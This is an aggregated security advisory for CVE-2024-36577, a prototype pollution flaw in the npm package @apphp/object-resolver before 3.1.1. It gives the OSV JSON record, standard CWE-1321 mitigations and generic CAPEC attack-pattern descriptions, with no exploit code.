apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@apphp/object-resolver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-36577"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1321"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-17T22:30:00Z",
    "nvd_published_at": "2024-06-17T16:15:15Z",
    "severity": "HIGH"
  },
  "details": "apphp js-object-resolver \u003c 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.",
  "id": "GHSA-qj86-v6m7-4qv2",
  "modified": "2024-07-05T21:14:25Z",
  "published": "2024-06-17T18:31:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36577"
    },
    {
      "type": "WEB",
      "url": "https://github.com/apphp/js-object-resolver/commit/7e347a26bf04d6a4f7525f6605666afbb218afca"
    },
    {
      "type": "WEB",
      "url": "https://gist.github.com/mestrtee/c90189f3d8480a5f267395ec40701373"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/apphp/js-object-resolver"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Object Resolver Prototype Pollution"
}

Mitigation
Implementation

By freezing the object prototype first (for example, Object.freeze(Object.prototype)), modification of the prototype becomes impossible.

Mitigation
Architecture and Design

By blocking modifications of attributes that resolve to object prototype, such as proto or prototype, this weakness can be mitigated.

Mitigation
Implementation

Strategy: Input Validation

When handling untrusted objects, validating using a schema can be used.

Mitigation
Implementation

By using an object without prototypes (via Object.create(null) ), adding object prototype attributes by accessing the prototype via the special attributes becomes impossible, mitigating this weakness.

Mitigation
Implementation

Map can be used instead of objects in most cases. If Map methods are used instead of object attributes, it is not possible to access the object prototype or modify it.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-180: Exploiting Incorrectly Configured Access Control Security Levels

An attacker exploits a weakness in the configuration of access controls and is able to bypass the intended protection that these measures guard against and thereby obtain unauthorized access to the system or network. Sensitive functionality should always be protected with access controls. However configuring all but the most trivial access control systems can be very complicated and there are many opportunities for mistakes. If an attacker can learn of incorrectly configured access security settings, they may be able to exploit this in an attack.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.